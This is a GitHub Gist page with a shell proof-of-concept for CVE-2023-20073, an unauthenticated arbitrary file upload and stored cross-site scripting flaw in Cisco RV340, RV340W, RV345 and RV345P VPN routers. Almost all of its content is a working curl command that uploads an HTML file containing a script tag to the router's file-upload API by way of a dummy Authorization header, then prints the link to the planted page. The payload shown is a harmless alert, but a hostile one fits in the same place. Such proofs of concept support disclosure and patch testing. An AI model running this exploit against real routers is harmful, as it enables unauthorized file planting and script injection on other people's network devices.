Skip to content

Instantly share code, notes, and snippets.

@win3zz
Created August 18, 2023 16:56
Show Gist options
  • Save win3zz/076742a4e365b1bba7e2ba0ebea9253f to your computer and use it in GitHub Desktop.
Save win3zz/076742a4e365b1bba7e2ba0ebea9253f to your computer and use it in GitHub Desktop.
Unauthenticated Arbitrary File Upload and Stored XSS in Cisco RV340, RV340W, RV345, RV345P VPN Routers (CVE-2023-20073)
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment